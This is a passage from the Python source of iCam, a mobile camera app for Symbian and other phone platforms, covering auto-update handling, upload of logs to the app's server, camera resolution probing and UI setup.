sys.stderr.write(myText + "\n")
sys.stderr.flush()
return
try:
myText = "AutoUpdate(): len(dataUpdate) = %d." \
% len(dataUpdate)
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
if (len(dataUpdate) > 2) and (dataUpdate[0] == "P") and \
(dataUpdate[1] == "K"):
# To avoid getting an invalid ZIP file we check only
# the magic number from the header (e.g., an ad from
# 110mb.com :) ) - in fact this might not be good
# enough.
"""
if len(dataUpdate) == \
os.path.getsize(TARGET_UPDATE_PATH_FILENAME):
myText = "AutoUpdate(): The installed version " \
"of iCam seems to be the most recent one."
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
return
"""
#fOutput = open(LOCAL_FOLDER + "/FilesFromServer/" +
# fileName, "wb")
fOutput = open(UPDATE_FROM_INTERNET_PATH_FILENAME,"wb")
fOutput.write(dataUpdate)
fOutput.close()
ApplyUpdate(UPDATE_FROM_INTERNET_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME_BACKUP)
else:
myText = "AutoUpdate(): What we downloaded does not " \
"seem to be an update for iCam."
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
except:
DebugPrintErrorTrace()
"""
EasyUpdate (that is the program autoupdates by copying
UPDATE_FILENAME if it exists as the new iCam default.py
script - it is the only way to replace the script, since only
the program can rewrite its file, otherwise if I want another
program to do the update I need to have AllFiles capabilities).
try:
UPDATE_FILENAME = "E:/iCam.py"
if os.path.exists(UPDATE_FILENAME):
appuifw.note(unicode("Found update. Copying it."), "info")
print "Found update. Copying it."
sys.stdout.flush()
CopyFile(UPDATE_FILENAME, "E:/private/e21e55ef/default.py")
os.unlink(UPDATE_FILENAME)
except:
exceptionType, exceptionValue, exceptionTraceback = \
sys.exc_info()
appuifw.note(unicode(repr(
traceback.format_tb(exceptionTraceback))), "info")
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
"""
elif WINDOWS_CE_OS_PYTHONCE:
pass
except:
DebugPrintErrorTrace()
def AutoUpdate():
#if USE_ICAM_SERVER:
#if useiCamServer > 0:
"""
AutoUpdate checks on the LocalDrive folder and on the Internet if there
is a new version of the application (what the update looks like should
depend on the smartphone OS and its' version.
"""
AutoUpdate_real()
"""
We MUST NOT start a new thread for AutoUpdate since:
- I guess it's not a good idea, in principle
- in AutoUpdate we make use of brief UI elements which need to run in
the main thread.
#BAD IDEA: thread.start_new_thread(AutoUpdate_real, ())
#BAD IDEA: MyThreadStart(AutoUpdate_real)
"""
def UploadUnsentLogs():
global LOCAL_FOLDER, MY_DEBUG_STDOUT
global STDERR_FILENAME_PREFIX, STDOUT_FILENAME_PREFIX
global stdoutFileName, stderrFileName
global uploadUnsentData
hasDownloadedNewCmd = DownloadCommands()
"""
DebugPrint("Entered UploadUnsentLogs(): uploadUnsentData = %d." % \
uploadUnsentData)
"""
DebugPrint("Entered UploadUnsentLogs().")
"""
if conserveEnergy or ((uploadUnsentData != 2) and (uploadUnsentData != 3)):
return
"""
try:
if not os.path.exists(LOCAL_FOLDER_SENT_LOGS):
os.makedirs(LOCAL_FOLDER_SENT_LOGS)
except:
DebugPrintErrorTrace()
try:
pathFolderName = LOCAL_FOLDER
folderContent = os.listdir(pathFolderName)
"""
Use reverse = False to send first the oldest ones (like this you send
in chronological order). Use reverse = True for sending first the
most recent ones.
"""
# sortedFolderContent = sorted(folderContent, reverse = False)
# sort() without parameters is the ONLY one that works in Python 2.2.
# (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
folderContent.sort()
sortedFolderContent = folderContent
DebugPrint("UploadUnsentLogs(): sortedFolderContent = %s." % \
sortedFolderContent)
for fileName in sortedFolderContent:
if (fileName.find(STDERR_FILENAME_PREFIX) != -1) or \
(fileName.find(STDOUT_FILENAME_PREFIX) != -1):
# Since we can't move currently open files we do not process
# them now.
if fileName == stdoutFileName or fileName == stderrFileName:
pass
else:
pathFileName = pathFolderName + "/" + fileName
# if os.path.isdir(pathFileName):
if os.path.isfile(pathFileName):
fileSize = os.path.getsize(pathFileName)
if fileSize < 10 * MEGA_BYTE:
myText = "UploadUnsentLogs(): sending log file %s "\
"of %d bytes at %s." \
% (fileName, fileSize,
GetCurrentDateTimeStringNice())
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
if UploadFile(pathFileName, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_FILE) != -1:
# We do not move stdout/stderr_Watchdog.txt
# files because we want to keep them together
# for the whole run. But we move
# stdout/stderr_Watchdog_*.txt
if (fileName.find("Watchdog.txt") == -1):
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_SENT_LOGS + "/" + \
fileName)
"""
UploadFile(pathFileName, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_FILE)
"""
We do not move stdout/stderr_Watchdog.txt files
because we want to keep them together for the
whole run. But we move stdout/stderr_Watchdog_*.txt
"""
if fileName.find("Watchdog.txt") == -1:
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
except:
# break
DebugPrintErrorTrace()
def GeneralUseCameraTest(cameraId):
def MyVideoRecordCallback(errorCode, eventType):
pass
#"""
# Not using this line --> gave error in camera2.py line 270
# saying NoneType
camera._my_camera = camera._camera.Camera(0)
# After this command the phone restarts.
#camera.start_finder(ViewFinderCallback, True, viewFinderSize)
#"""
"""
DebugPrint("Before camera._camera.Camera(1)")
camera._my_camera = camera._camera.Camera(1)
DebugPrint("After camera._camera.Camera(1)")
camera.device[1] = camera._my_camera
# The thread crashes here - it says:
# "Application closed: InFrameProcThread."
pic = camera.take_photo("RGB", (320, 240), 0, "none", "auto",
"auto", 1)
"""
"""
camera.device[0] = camera._my_camera
# The thread crashes here - it says:
# "Application closed: OutFrameProcThread.
pic = camera.take_photo("RGB", (640, 480), 0, "none", "auto",
"auto", 0)
"""
# Save the photo (as JPEG) with maximum quality (100%) locally.
#pic.save(r"E:\RGB.jpg", None, None, 100)
# """
# After this command the phone restarts when camera is 1.
camera.start_finder(ViewFinderCallback, True, viewFinderSize)
DebugPrint("After camera.start_finder()")
"""
# Seems not to work:
#camera.start_record(r"E:\my_vid_2.mp4", MyVideoRecordCallback,
# format = "EFormatYUV420Planar", frameSize = (320, 240),
# frameRate = 0.0,
# videoType = "video/mp4v-es; profile-level-id=4",
# audioEnabled = True)
#camera.start_record(r"E:\my_vid_2.mp4", MyVideoRecordCallback,
# format = "EFormatYUV420Planar", frameSize = (176, 144),
# frameRate = 30.0, videoType = "", audioEnabled = True)
"""
# No video with camera2.
camera.start_record(r"E:\my_vid_camera.mp4", MyVideoRecordCallback)
e32.ao_sleep(5.0)
camera.stop_record()
# """
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# The application waits for the signal from Quit(), in
# order to exit.
appLock.wait()
def GeneralUseCameraG810():
# Not using this line --> gave error in camera2.py line 270
# saying NoneType.
camera._my_camera = camera._camera.Camera(0)
camera.device[0] = camera._my_camera
DebugPrint("After opening camera on SamsungSGH-G810.")
#DebugPrint("Before camera.start_finder()")
def MyVideoRecordCallback(errorCode, eventType):
pass
# After this command the phone restarts when camera is 1.
camera.start_finder(ViewFinderCallback, True, viewFinderSize)
"""
# Seems not to work at all:
#camera.start_record(r"E:\my_vid_2_new.mp4",
# MyVideoRecordCallback, format = "EFormatYUV420Planar",
# frameSize = (320, 240), frameRate = 0.0,
# videoType = "video/mp4v-es; profile-level-id=4",
# audioEnabled = True)
# Seems not to work:
#camera.start_record(r"E:\my_vid_EFormatYUV422.mp4",
# MyVideoRecordCallback, format = "EFormatYUV422",
# frameSize = (320, 240), frameRate = 15.0,
# videoType = "video/mp4v-es; profile-level-id=4",
# audioEnabled = True)
# Testing without success video record on G810:
# Seems not to work:
#camera.start_record(r"E:\my_vid_3.mp4", MyVideoRecordCallback,
# format = "EFormatYUV420Planar", frameSize = (320, 240),
# frameRate = 30.0,
# videoType = "video/mp4v-es; profile-level-id=4",
# audioEnabled = True)
"""
camera.start_record(
r"E:\my_vid_3.mp4",
MyVideoRecordCallback,
format="EFormatYUV420Planar",
frameSize=(320, 240),
frameRate=0.0,
videoType="video/mp4v-es; profile-level-id=4",
audioEnabled=True
)
e32.ao_sleep(7.0)
camera.stop_record()
DebugPrint("After camera.stop_record().")
#DebugPrint("Before camera.start_finder()")
def GeneralUseCameraS60(cameraId):
if SYMBIAN_OS:
try:
if False:
GeneralUseCameraTest(cameraId)
# Samsung G810 specific: !!!!
if phoneModel == "SamsungSGH-G810":
GeneralUseCameraG810()
else:
if camera2IsImported:
# camera.release()
camera.UseCamera(cameraId)
else:
"""
When using camera2, this doesn't do anything - on
camera2 we have to explicitely choose a camera.
"""
try:
camera.release()
except:
DebugPrintErrorTrace()
camera._my_camera = camera._camera.Camera(cameraId)
except:
DebugPrintErrorTrace()
canvas = None
redrawHandlerRunning = None
myImg = None
appLock = None
def RedrawHandler(rect):
global canvas, myImg
global stateLoaded
global redrawHandlerRunning
global doNotDisplayRedrawInfo
"""
When inside RedrawHandler() (actually DisplayRedrawInfo()) another
instance of RedrawHandler() is called which probably messes some
things up and results in crashing iCam.
"""
if redrawHandlerRunning == True:
return
redrawHandlerRunning = True
DebugPrint("Entered RedrawHandler(): rect = %s" % str(rect))
# It probably crashes iCam - indirect recursive call - begin_redraw()
# triggers execution of HandleRedraw()
#canvas.begin_redraw()
#canvas.end_redraw()
try:
if myImg:
canvas.blit(myImg)
if doNotDisplayRedrawInfo == True:
DebugPrint("RedrawHandler(): not calling ClearScreen() " \
"because doNotDisplayRedrawInfo == True.")
"""
!!!!
return
"""
else:
ClearScreen()
except:
DebugPrintErrorTrace()
if stateLoaded:
DisplayRedrawInfo()
redrawHandlerRunning = False
def ResizeHandler(newSize):
DebugPrint("Entered ResizeHandler(): newSize = %s" % str(newSize))
#displaySize
displaySizeMin = -1
displaySizeMax = -1
def SetupSymbian():
#global keyboard
global canvas, redrawHandlerRunning, myImg, appLock
#global displaySize
global displaySizeMin, displaySizeMax
global bluetoothSelfAddress, bluetoothSelfName
DebugPrint("Entered SetupSymbian()\n" + \
"S60_EDITION=%s, SYMBIAN_OS=%d, SYMBIAN_S60_OS=%d, " \
"SYMBIAN_S60_2ND_ED=%d, SYMBIAN_S60_3RD_ED=%d, SYMBIAN_1=%d, " \
"SYMBIAN_3=%d, SYMBIAN_UIQ_OS=%d" % (str(S60_EDITION), SYMBIAN_OS, \
SYMBIAN_S60_OS, SYMBIAN_S60_2ND_ED, SYMBIAN_S60_3RD_ED, \
SYMBIAN_1, SYMBIAN_3, SYMBIAN_UIQ_OS))
try:
keyboard = Keyboard()
DebugPrint("SetupSymbian(): keyboard = %s" % str(keyboard))
# appuifw.app.orientation = "landscape"
# appuifw.app.menu = None - gives error
"""
if SYMBIAN_S60_3RD_ED and (not _PyS60_1_9_OR_NEWER):
pass
else:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.body - From PyS60 2.0 manual:
"The UI control that is visible in the application's main window.
Currently either Text, a Listbox object, Canvas, or None".
"""
"""
t = appuifw.Listbox()
appuifw.app.body = t
"""
"""
# From http://croozeus.com/blogs/?p=215:
#"Text is a text editor UI control that allows text with various formatting
# to be displayed."
#t = appuifw.Text()
# Set the color of the text:
t.color = 0xFF0000
# Set the font by name, size and flags:
#t.font = (u"Nokia Hindi S60", 25, None)
# Set the color in which the text will be highlighted:
#t.highlight_color = 0xFFFF00
# Highlight the text in a normal way and set the style of the text to
# underlined:
#t.style = (appuifw.HIGHLIGHT_STANDARD | appuifw.STYLE_UNDERLINE)
# Write text to see the effect:
t.add(u"This is an example")
"""
"""
while True:
e32.ao_sleep(1.0)
"""
if SYMBIAN_3:
"""
For Symbian^3 devices we disable the directional_pad - it seems it is
not supported, and it will MAKE THE CANVAS SMALLER WITHOUT
DISPLAYING ANYTHING if we enable it.
From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/07._Graphics_and_Multimedia#Displaying_and_Handling_Image_Objects:
For these, you can use the canvas to display a virtual directional
pad (if the application is in full screen mode, the directional
pad is accompanied by two virtual softkeys, as shown in
Figure 7.1).
The pad can be enabled or disabled by setting
appuifw.app.directional_pad to True or False, respectively.
From http://discussion.forum.nokia.com/forum/showthread.php?203133-How-to-get-rid-of-virtual-buttons-and-softkey-labels-on-X6 :
"Have you tried setting appuifw.app.directional_pad = False ?
Do that after setting the screen to 'full' ('full_max' is no longer
used in more recent versions of PyS60, I think it was only
available in 1.9.4) and before setting the app's body to Canvas and
it should work."
"""
appuifw.app.directional_pad = False
"""
To change the softkey labels see:
http://discussion.forum.nokia.com/forum/showthread.php?166614-English-softkey-labels
http://discussion.forum.nokia.com/forum/showthread.php?78957-announce-uikludges-enable-right-sofkey-label-modification
http://discussion.forum.nokia.com/forum/showthread.php?89557-Controlling-quot-menu-quot-and-quot-exit-quot-labels-in-the-UI
http://wiki.forum.nokia.com/index.php/Softkey_labels
"""
redrawHandlerRunning = False
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
displaySize = sysinfo.display_pixels()
else:
displaySize = (100, 100)
DebugPrint("SetupSymbian(): displaySize = %s." % (str(displaySize)))
displaySizeMin = displaySize[0]
displaySizeMax = displaySize[1]
if displaySizeMax < displaySizeMin:
displaySizeMin = displaySize[1]
displaySizeMax = displaySize[0]
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
"""
myImg = graphics.Image.new(displaySize)
myImg.rectangle((0, 0, displaySizeMax - 1, displaySizeMax - 1), fill=0)
# , width = 20)
"""
# myImg = graphics.Image.open(r"E:\private\e21e55ef\wallpaper.jpg")
canvas = appuifw.Canvas(RedrawHandler, keyboard.HandleEvent,
ResizeHandler)
# """
# Create an image the size of the screen
# appuifw.app.body.begin_redraw() # AttributeError: begin_redraw()
# myImg = graphics.Image.new(sysinfo.display_pixels())
"""
myImg = graphics.Image.new((360, 640))
myImg.rectangle((0, 0, 359, 639), fill=0x00FF00, width=20)
"""
# appuifw.app.body.end_redraw()
# Make the background a canvas; needed for key capturing
# Canvas([redraw_callback=None, event_callback=None,
# resize_callback=None ])
# canvas = appuifw.Canvas( None, keyboard.HandleEvent)
appuifw.app.body = canvas
"""
# Test if application is in foreground or background - from
# http://discussion.forum.nokia.com/forum/showthread.php?214083-appswitch-module.
import appuifw
def cb(fg):
if(fg):
print "foreground"
else:
print "background"
appuifw.app.focus=cb
"""
"""
try:
# 'Canvas' object has no attribute 'resize' .
canvas.resize((360, 640))
except:
DebugPrintErrorTrace()
"""
appLock = e32.Ao_lock()
# myTimer = e32.Ao_timer()
DebugPrint("canvas.size = %s" % str(canvas.size))
"""
DebugPrint("Before appuifw.app.exit_key_handler: " \
"canvas.size = %s" % str(canvas.size))
"""
appuifw.app.exit_key_handler = ConfirmQuit # Quit
"""
N82, N95, etc
240 x 320 pixels
E7, N8
360 x 640 pixels
canvas.size = (360, 480)
"""
"""
DebugPrint("Before calling appuifw.app.screen: " \
"canvas.size = %s" % str(canvas.size))
"""
# Normal screen with title pane and softkey labels
appuifw.app.screen = "normal"
# Only softkey labels visible.
# appuifw.app.screen = "large"
# It uses for Canvas the entire screen - no menu appears.
# (full screen mode on all devices).
# appuifw.app.screen = "full"
"""
DebugPrint("canvas.size = %s\n" % str(canvas.size) + \
"sysinfo.display_pixels() = %s" % str(sysinfo.display_pixels()))
"""
"""
canvas.size = (360, 640) # AttributeError: can't set attribute
DebugPrint("canvas.size = %s" % str(canvas.size))
"""
"""
# From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/08._Touch_User_Interface#Detecting_a_touch_event_within_a_rectangle:
def BlueDown(event):
''' Blue DOWN event handler '''
appuifw.note(u"Blue Down")
import key_codes
appuifw.app.body.begin_redraw()
canvas.bind(key_codes.EButton1Down, BlueDown, ((0, 0), (359, 639)))
appuifw.app.body.end_redraw()
"""
"""
appuifw.app.body.begin_redraw()
canvas.rectangle(((0, 0), (359, 639)), fill=(0, 0, 255), width=5)
appuifw.app.body.end_redraw()
"""
#canvas.text((100, 100), u"DOWN", fill=(0, 0, 0),
# font=(u'Nokia Hindi S60', 40, appuifw.STYLE_BOLD))
except:
DebugPrintErrorTrace()
if misoIsImported:
try:
bluetoothSelfAddress = miso.local_bt_address()
except:
DebugPrint("MainSetUI(): miso.local_bt_address() returned exception.")
DebugPrintErrorTrace()
try:
"""
It gives a "KErrHardwareNotAvailable" exception if the
Bluetooth is not on (or maybe even when it is not set
up - no name and probably never activated).
"""
bluetoothSelfName = miso.local_bt_name()
except:
DebugPrint("MainSetUI(): miso.local_bt_name() returned exception.")
DebugPrintErrorTrace()
DebugPrint("Exiting SetupSymbian().")
#!!!!TODO: Put code in LoadMDExtensionScript() in global space - see comments below!!!!
def LoadMDExtensionScript():
"""
The execfile() has to be issued in the "global space" (i.e., outside functions),
otherwise the function and variable redefinition might not work,
probably because of "execfile() cannot be used reliably to modify a
function's locals" (see below).
From http://docs.python.org/library/functions.html#execfile.
Note:
The default locals act as described for function locals() below:
modifications to the default locals dictionary should not be attempted.
Pass an explicit locals dictionary if you need to see effects of the code
on locals after function execfile() returns.
execfile() cannot be used reliably to modify a function's locals.
"""
EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME = "iCam_MD.py"
EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME = LOCAL_FOLDER + "/" + \
EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME
try:
# if os.path.exists(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME):
if os.path.isfile(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME):
DebugPrint("LoadMDExtensionScript(): Found %s. Loading it." % \
EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME)
execfile(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME)
DebugPrint("LoadMDExtensionScript(): " \
"numHotspots = %d." % numHotspots)
except:
DebugPrint("LoadMDExtensionScript(): execfile(%s) returned " \
"exception." % EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME)
DebugPrintErrorTrace()
# For PyObjC
testBedViewControllerInstance = None
NSTimer = None
UIApplicationInstance = None
UIImagePickerControllerInstance = None
UIImagePickerControllerSourceTypeCamera = None
OSName = None
def MainSetUI():
global orientationForThisPhoneModel
if ANDROID_OS:
try:
DisplayRedrawInfo()
except:
"""
DebugPrint("MainSetUI(): Could not check existence/create %s." % \
HTML_PATHFILENAME)
"""
DebugPrintErrorTrace()
if False:
TestPhoneCall()
orientationForThisPhoneModel = "portrait"
SetMenu(True)
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
# audio.say(u"I can't get no satisfaction")
try:
if phoneModel in ["Nokia6120", "Nokia5800", "Nokia5230", "Nokia5530", \
"NokiaC5", \
"NokiaN95", "NokiaN97mini", "NokiaN82", \
"NokiaN8", "NokiaE7", "NokiaC5-03", "NokiaC6", "NokiaC7", \
"NokiaX6"]:
orientationForThisPhoneModel = "landscape"
elif phoneModel in ["Nokia6680", \
"NokiaN70", \
"NokiaE50-1", "NokiaE63", "NokiaE65", \
"NokiaE5", "NokiaE72", "NokiaE75"]:
orientationForThisPhoneModel = "portrait"
elif S60_EDITION[0] >= 3:
# In principle most other 3rd edition phones should be landscape
orientationForThisPhoneModel = "landscape"
else:
orientationForThisPhoneModel = "portrait"
# We change orientation if necessary to be able to access the biggest
# resolutions of the main camera.
SetUIOrientation(0, False)
#appuifw.note(u"Welcome to iCam! (Returned from SetUIOrientation() " \
# ":) ).", "info")
appuifw.note(u"Welcome to iCam!", "info")
"""
try:
appuifw.app.body.begin_redraw()
canvas.text((100, 100), u"Welcome to iCam: state!",
fill = (255, 0, 255))
appuifw.app.body.end_redraw()
except:
DebugPrintErrorTrace()
"""
# To get the right values for cameraPhotoSizes* we need to be in
# landscape mode.
#e32.reset_inactivity()
#e32.ao_sleep(3)
#e32.ao_sleep(5)
except:
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
orientationForThisPhoneModel = "portrait"
SetMenu(True)
elif iOS_PYOBJC:
orientationForThisPhoneModel = "portrait"
SetMenu(True)
elif WINDOWS_CE_OS_PYTHONCE:
orientationForThisPhoneModel = "portrait"
SetMenu(True)
# We send this text msg to the iCam server a bit later.
myTextMainCamera2Video = ""
def SetCameraParamsS60():
global myTextMainCamera2Video
global numCamerasSupported
global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
global localVideoMode
DebugPrint("Entered SetCameraParamsS60().")
"""
Required to acquire properly the supported camera resolutions, in case
I have done import camera before changing the app orientation.
Otherwise, for landscape mode phones we:
- will not get the biggest resolutions of the main camera
- the biggest take_photo(camera = 0) might raise expcetion
ValueError: "Size not supported for camera".
(This is so because the initalization with supported camera resolutions
is partly done only once at the very beginning of the camera
module, which assumes that app orientation cannot change.
Note, however, that the best solution would be to add in camera.py a
function that does all these operations.
"""
"""
# When using camera2, this doesn't do anything - on camera2 we have to
# explicitely choose a camera.
camera.release()
#camera._my_camera = camera._camera.Camera(0)
camera.UseCamera(0)
"""
GeneralUseCameraS60(0)
"""
camera.device = []
for dev_index in range(camera.number_of_devices):
# Used only for image size checking.
camera.device.append(camera._camera.Camera(dev_index))
"""
"""
if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
# For phones that take Main camera photos with the Camera App in
# landscape mode - Switch to landscape mode, before import
# camera, in order to be able to take_photo() at the highest
# resolution for the Main camera.
appuifw.app.orientation = "landscape"
"""
"""
#import audio
#audio.Sound.set_volume(0)
SetUIOrientation(0, True)
#!!!!I don't know why do I need it.
#e32.ao_sleep(2) #it was 4 before
"""
try:
numCamerasSupported = camera.cameras_available()
except:
DebugPrintErrorTrace()
if phoneModel == "SamsungSGH-G810":
# The VGA camera doesn't really seem to work at all - it makes the
# phone restart when giving take_photo?!!!!
numCamerasSupported = 1
# numCamerasSupported = 1
if numCamerasSupported >= 1:
"""
camera.release()
#camera._my_camera = camera._camera.Camera(0)
camera.UseCamera(0)
"""
# Retrieving the supported resolutions for the Main camera:
if orientationForThisPhoneModel == "landscape":
cameraPhotoSizes_JPEG_Exif[0] = camera.image_sizes("JPEG_Exif")
#print "cameraPhotoSizes_JPEG_Exif = ", cameraPhotoSizes_JPEG_Exif
cameraPhotoSizes_RGB24[0] = camera.image_sizes("RGB")
else:
#print "cameraPhotoSizes_RGB24 = ", cameraPhotoSizes_RGB24
#cameraPhotoSizes = [(2592, 1944)] + cameraPhotoSizes
#cameraPhotoSizes_landscape = \
# cameraPhotoSizes_landscape_JPEG_Exif + \
# cameraPhotoSizes_landscape_RGB24
cameraPhotoSizes_JPEG_Exif[0] = camera.image_sizes("JPEG_Exif")
cameraPhotoSizes_RGB24[0] = camera.image_sizes("RGB")
"""
if MY_DEBUG_STDOUT:
print "camera.image_sizes(RGB16) = %s" % \
str(camera.image_sizes("RGB16"))
print "camera.image_sizes(RGB12) = %s" % \
str(camera.image_sizes("RGB12"))
print "camera.image_sizes(JPEG_JFIF) = %s" % \
str(camera.image_sizes("JPEG_JFIF"))
sys.stdout.flush()
"""
#cameraPhotoSizes_JPEG_Exif = cameraPhotoSizes_JPEG_Exif + [(0, 0)]
if numCamerasSupported == 2:
try:
# Retrieving the supported resolutions for the VGA camera:
"""
camera.release()
#camera._my_camera = camera._camera.Camera(1)
camera.UseCamera(1)
"""
GeneralUseCameraS60(1)
cameraPhotoSizes_JPEG_Exif[1] = camera.image_sizes("JPEG_Exif")
cameraPhotoSizes_RGB24[1] = camera.image_sizes("RGB")
if camera2IsImported:
# camera._camera.SetCameraParameters(aMode, aSize, aZoom,
# aFlash, aExp, aWhite)
# camera._camera.SetCameraSettings()
DebugPrint(
"camera._my_video.GetVideoRecordFormatsCount() = %d.\n" % \
camera._my_video.GetVideoRecordFormatsCount() +
"camera._my_video.GetVideoControllersCount() = %d." % \
camera._my_video.GetVideoControllersCount())
for cId in range(1, -1, -1):
cameraVideoFormats[cId] = \
camera.GetVideoFrameFormatsSupportedStringList()
cameraVideoFrameSizes[cId] = \
camera.GetVideoFrameSizes("EFormatYUV420Planar")
cameraVideoModes[cId] = \
camera.GetVideoFrameRates("EFormatYUV420Planar")
localVideoMode[cId] = \
(cameraVideoModes[cId][localVideoModeIndex[cId]]["size"],
cameraVideoModes[cId][localVideoModeIndex[cId]]["rate"])
# cameraVideoModes[1] = ...
myText = "The %s camera:\n" % cameraStr[cId]
myText += " Video formats supported: " \
"cameraVideoFormats[%d] = %s.\n" % \
(cId, str(cameraVideoFormats[cId]))
myText += " TCameraInfo.iVideoFrameFormatsSupported " \
"= 0x%X.\n" % \
camera._my_camera.video_formats()
myText += " Video frame sizes supported for mode " \
"EFormatYUV420Planar: " \
"cameraVideoFrameSizes[%d] = %s.\n" % \
(cId, str(cameraVideoFrameSizes[cId]))
#myText += " Video frame rates supported: %s.\n" % \
# cameraVideoModes[1]
myText += " Video frame rates supported for mode " \
"EFormatYUV420Planar: " \
"cameraVideoModes[%d] = %s.\n" % \
(cId, str(cameraVideoModes[cId]))
if cId == 0:
myText += " Video frame sizes supported for mode " \
"EFormatYUV422: %s.\n" % \
str(camera.GetVideoFrameSizes("EFormatYUV422"))
myText += " Video frame rates supported for mode " \
"EFormatYUV422: %s.\n" % \
str(camera.GetVideoFrameRates("EFormatYUV422"))
myText += " Video frame sizes supported for mode " \
"EFormatEncodedH264: %s.\n" % \
str(camera.GetVideoFrameSizes("EFormatEncodedH264"))
myText += " Video frame rates supported for mode " \
"EFormatEncodedH264: %s.\n" % \
str(camera.GetVideoFrameRates("EFormatEncodedH264"))
"""
N82: Video frame rates supported
[{'size_index': 0, 'rate': 30.0, 'size': (640, 480)},
{'size_index': 0, 'rate': 15.0, 'size': (640, 480)},
{'size_index': 1, 'rate': 30.0, 'size': (320, 240)},
{'size_index': 1, 'rate': 15.0, 'size': (320, 240)},
{'size_index': 2, 'rate': 30.0, 'size': (176, 144)},
{'size_index': 2, 'rate': 15.0, 'size': (176, 144)}].
"""
for videoMode in cameraVideoFormats[cId]:
"""
for i in range(camera._my_camera.max_frame_size()):
fs = camera._my_camera.frame_size(
camera.formatMap[videoMode], i)
"""
for i in range(camera._my_camera.
GetNumVideoFrameSizesSupported()):
frameSize = camera._my_camera.frame_size(
camera.formatMap[videoMode], i)
if frameSize != (0, 0):
myText += " videoMode %s, index %d, " \
"resolution %4d x %4d\n" % \
(videoMode, i, frameSize[0],
frameSize[1])
# ~ for f in range(camera._my_camera.max_frame_rate()):
# ~ r=camera._my_camera.frame_rate(camera.
# formatMap[videoMode], f, i,
# camera.exposuremap['auto'])
# ~ log(" rate: index %d, value %5.2f" % (f, r))
DebugPrint(myText)
if cId == 1:
#!!!!
#camera.release()
##camera._my_camera = camera._camera.Camera(0)
#camera.UseCamera(0)
GeneralUseCameraS60(0)
elif cId == 0:
# We send this text msg to the iCam server a bit later, so we save it.
myTextMainCamera2Video = myText
except:
DebugPrintErrorTrace()
# Every (Symbian) phone should support this resolution.
#localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]
DebugPrint(
"cameraPhotoSizes_JPEG_Exif[0] = %s\n" % \
str(cameraPhotoSizes_JPEG_Exif[0]) + \
"cameraPhotoSizes_RGB24[0] = %s" % str(cameraPhotoSizes_RGB24[0]))
if numCamerasSupported == 2:
DebugPrint("cameraPhotoSizes_JPEG_Exif[1] = %s\n" % \
str(cameraPhotoSizes_JPEG_Exif[1]) + \
"cameraPhotoSizes_RGB24[1] = %s" % \
str(cameraPhotoSizes_RGB24[1]))
# In case it returns the wrong resolutions for "portrait" mode
# instead of "landscape" mode.
if phoneModel in ["NokiaN95", "NokiaN82", "NokiaX6", "NokiaE5",
"NokiaE72"] and \
cameraPhotoSizes_JPEG_Exif[0][0] != (2592, 1944):
cameraPhotoSizes_JPEG_Exif[0] = [
(2592, 1944),
(2048, 1536),
(1600, 1200),
(1024, 768),
(640, 480)
]
DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s" % \
str(cameraPhotoSizes_JPEG_Exif[0]))
elif phoneModel == "NokiaE7":
if cameraPhotoSizes_JPEG_Exif[0][0] != (3264, 2448):
cameraPhotoSizes_JPEG_Exif[0] = [
(3264, 2448),
(3264, 1832),
(2592, 1944),
(2592, 1456),
(2048, 1536),
(1600, 1200),
(1280, 960),
(1024, 768),
(640, 480),
]
DebugPrint( ("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s.\n" % \
str(cameraPhotoSizes_JPEG_Exif[0])) )
if cameraPhotoSizes_JPEG_Exif[1][0] != (640, 480):
cameraPhotoSizes_JPEG_Exif[1] = [(640, 480), (320, 240)]
cameraPhotoSizes_RGB24[1] = [(640, 480), (320, 240)]
DebugPrint( "Corrected cameraPhotoSizes_RGB24[1] to %s." % \
str(cameraPhotoSizes_RGB24[1]) )
elif (phoneModel == "NokiaN8") and \
(cameraPhotoSizes_JPEG_Exif[0][0] != (4000, 3000)):
cameraPhotoSizes_JPEG_Exif[0] = [
(4000, 3000),
(4000, 2248),
(3264, 2448),
(3264, 1832),
(2592, 1944),
(2592, 1456),
(2048, 1536),
(1600, 1200),
(1280, 960),
(1024, 768),
(640, 480)
